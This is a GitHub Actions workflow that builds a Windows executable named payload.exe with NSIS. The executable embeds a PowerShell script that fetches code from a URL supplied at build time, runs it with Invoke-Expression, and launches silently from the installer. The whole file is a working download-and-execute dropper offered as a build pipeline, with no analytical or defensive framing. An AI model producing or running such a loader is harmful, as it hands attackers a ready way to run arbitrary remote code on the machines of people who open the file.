name: Build PowerShell EXE using NSIS

on:
  workflow_dispatch:
    inputs:
      payload_url:
        description: 'URL to fetch payload'
        required: true
        type: string

jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v3

    - name: Install NSIS
      shell: powershell
      run: choco install nsis -y

    - name: Generate PowerShell Script
      shell: powershell
      run: |
        $payloadUrl = "${{ github.event.inputs.payload_url }}"
        $scriptContent = @"
        function Fetch-Execute {
            param ([string]`$url)
            try {
                `$response = Invoke-RestMethod -Uri `$url
                Invoke-Expression `$response
            } catch {
                Write-Host `"Error: Cannot fetch or execute script.`"
            }
        }
        Fetch-Execute -url `"$payloadUrl`"
        "@
        $scriptContent | Set-Content -Path "script.ps1" -Encoding UTF8

    - name: Generate NSIS Script
      shell: powershell
      run: |
        $nsisScript = @"
        !define OUTPUT "payload.exe"

        Outfile "${OUTPUT}"

        Section
          SetOutPath `$PLUGINSDIR
          File "script.ps1"
          nsExec::Exec '"$WINDIR\System32\WindowsPowerShell\v1.0\powershell.exe" -File "$PLUGINSDIR\script.ps1"'
        SectionEnd
        "@
        $nsisScript | Set-Content -Path "script.nsi" -Encoding UTF8

    - name: Build EXE using NSIS
      shell: cmd
      run: makensis script.nsi

    - name: Upload EXE Artifact
      uses: actions/upload-artifact@v4
      with:
        name: payload_exe
        path: payload.exe


